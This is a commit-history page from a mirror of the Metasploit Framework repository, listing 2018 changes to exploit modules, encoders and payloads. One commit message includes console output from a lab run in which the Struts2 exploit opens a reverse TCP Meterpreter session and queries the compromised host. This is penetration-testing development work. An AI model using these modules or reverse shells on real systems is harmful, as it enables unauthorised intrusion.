infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
48,189 Commits
7 Branches
556 Tags
419 MiB
Commit Graph

24630 Commits (e753eddb6b11b1a13b5686625b1c9ea9784fb6e4)

Author SHA1 Message Date
Erin Bleiweiss 3c115f1bfc
Update json parsing rules for external modules 2018-08-31 16:48:56 -05:00
Shelby Pace 6ec8522786
Land #10482, Add Network Manager VPNC Privesc 2018-08-30 10:46:54 -05:00
Jacob Robles 9d3e1c1942
Land #10540, weblogic_deserialize, add check method and linux target 2018-08-30 06:08:03 -05:00
Jacob Robles 953bafc7e7
Land #10545, foxit fix generated strings, update doc 2018-08-30 05:55:44 -05:00
Jacob Robles 3161beff69
Prefer opt hash 2018-08-29 14:56:31 -05:00
Adam Cammack a57e5ac5c0
Land #10594, Remove trailing space from CVE number 2018-08-29 14:31:21 -05:00
Jacob Robles bc4442694e
Fix Windows target options, remove comspec 2018-08-29 14:23:00 -05:00
Ben Schmeckpeper c4d697a629
Remove trailing space from CVE identifier 
ASUS Net4Switch ipswcom exploit mistakenly included a trailing space at the end of its CVE reference.
 2018-08-29 14:12:49 -05:00
William Vu 468613f688
Land #10536, https:// reference check for msftidy 2018-08-29 11:14:42 -05:00
Jacob Robles d5ad683ba6
More doc updates 2018-08-29 10:59:36 -05:00
Jacob Robles 086ec5bdfb
Fix generated strings in pdf 2018-08-29 06:24:20 -05:00
William Vu 326f006146
Land #10542, CVE ref for office_ms17_11882 exploit 2018-08-29 00:42:53 -05:00
Christian Mehlmauer 14fa41a376
merge changes 2018-08-29 06:09:40 +02:00
William Vu ba76292c40
Land #10543, struts2_rest_xstream targeting fixes 2018-08-28 16:50:26 -05:00
William Vu f6b868bac2 Prefer regex for target check in exploit method 
This is how I initially wrote it out, and I think I like it better.
Obviously we'll still check individual symbols in execute_command, since
some of the matching is disjoint.
 2018-08-28 15:56:45 -05:00
Adam Cammack 2958f9a83f
Land #10541, Correct claymore_dos.py's CVE ref 2018-08-28 15:35:16 -05:00
William Vu 3dec79da23 Add Windows ARCH_CMD target and refactor again 
Must have been an oversight that I didn't add the target.
 2018-08-28 15:03:41 -05:00
Ben Schmeckpeper 6335d867ec
Add CVE reference to office_ms17_11882 exploit 
The CVE identifier appears in a  GitHub URI but is not referenced separately.
 2018-08-28 13:44:01 -05:00
Ben Schmeckpeper ed60b767a7
Correct claymore_dos.py's CVE reference 
The CVE reference shouldn't include the `CVE-` prefix
 2018-08-28 13:34:02 -05:00
Jacob Robles 94e8cdac37
Move files to correct location 2018-08-28 12:38:54 -05:00
Jacob Robles 2986a9538d
Whitespace fix 2018-08-28 11:53:08 -05:00
Jacob Robles 49c5a91fa7
Add linux target to weblogic_deserialize module 2018-08-28 11:51:04 -05:00
bwatters-r7 20daba6e2d
fix line endings 2018-08-28 11:33:17 -05:00
alpiste f1e4079641 move add_thread code to lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb 2018-08-28 09:02:21 -05:00
alpiste 015abca8af MSFTidy module 2018-08-28 09:02:21 -05:00
alpiste bb151bb727 MSFTidy module 2018-08-28 09:02:21 -05:00
alpiste 2251c4a712 Add peinjector post module 2018-08-28 09:02:21 -05:00
Jacob Robles 12e9cf6af7
Version output 2018-08-28 08:20:02 -05:00
Jacob Robles f92d2263d0
Add check to weblogic_deserialize module 2018-08-28 08:09:30 -05:00
Christian Mehlmauer 7431ae401b
fix more errors 2018-08-28 13:49:31 +02:00
Christian Mehlmauer a66556b436
fix msftidy errors 2018-08-28 13:12:43 +02:00
William Vu 7d21c2094e Improve PSH target and refactor check code 2018-08-27 20:18:35 -05:00
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream 
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
 2018-08-27 20:01:00 -05:00
Brent Cook 53b369d702 avoid inserting a float into instruction generation randomly 2018-08-27 11:24:38 -05:00
Brent Cook 47ca6c6a14
Land #10527, Fix msftdiy EDB link check, enable HTTPS 2018-08-27 10:49:20 -05:00
Jacob Robles 79b3e4564a
Land #10487, add php5 session file target 2018-08-27 06:22:28 -05:00
Brendan Coles 9725e90ba7 Fix msftdiy EDB link check 2018-08-26 04:18:38 +00:00
Brent Cook cb07ba2b6c
Land #10516, Add brace expansion encoder and update ${IFS} encoder 2018-08-25 22:23:07 -05:00
William Vu 6df235062b
Land #10505, post-auth and default creds info 2018-08-24 18:08:15 -05:00
Brent Cook 51c024982c
Land #8914, refactor auxiliary/admin/http credential storage 2018-08-24 13:18:32 -05:00
Brent Cook 0141fc109d don't backtrace if there is not a response 2018-08-24 13:17:06 -05:00
Jacob Robles f6674a96d9
Update poc link 2018-08-24 10:52:01 -05:00
Jacob Robles 7f3824b067
Additional path for Linux target 2018-08-24 07:18:24 -05:00
William Vu 672dbb7acb
Land #9364, HP PJL/SNMP CVE-2017-2741 exploit 
Finally!
 2018-08-23 22:47:09 -05:00
William Vu 318ff95dbd Remove trailing whitespace from netcat payloads 
This has been bugging me for so long.
 2018-08-23 21:33:58 -05:00
William Vu 4ff2c1dbe8 Add brace expansion encoder 2018-08-23 21:33:43 -05:00
William Vu eeea3356ae Update ${IFS} encoder 2018-08-23 21:33:42 -05:00
Wei Chen 2193dd662d
Land #10504, add Foxit Reader UAF Module and Docs 2018-08-23 18:56:07 -05:00
Matthew Kienow ecc6c473d8
Add note about unauthenticated telnetd service 2018-08-23 15:50:41 -04:00
Jacob Robles 7ceae8df58
Remove '.exe' from share name 2018-08-23 14:38:46 -05:00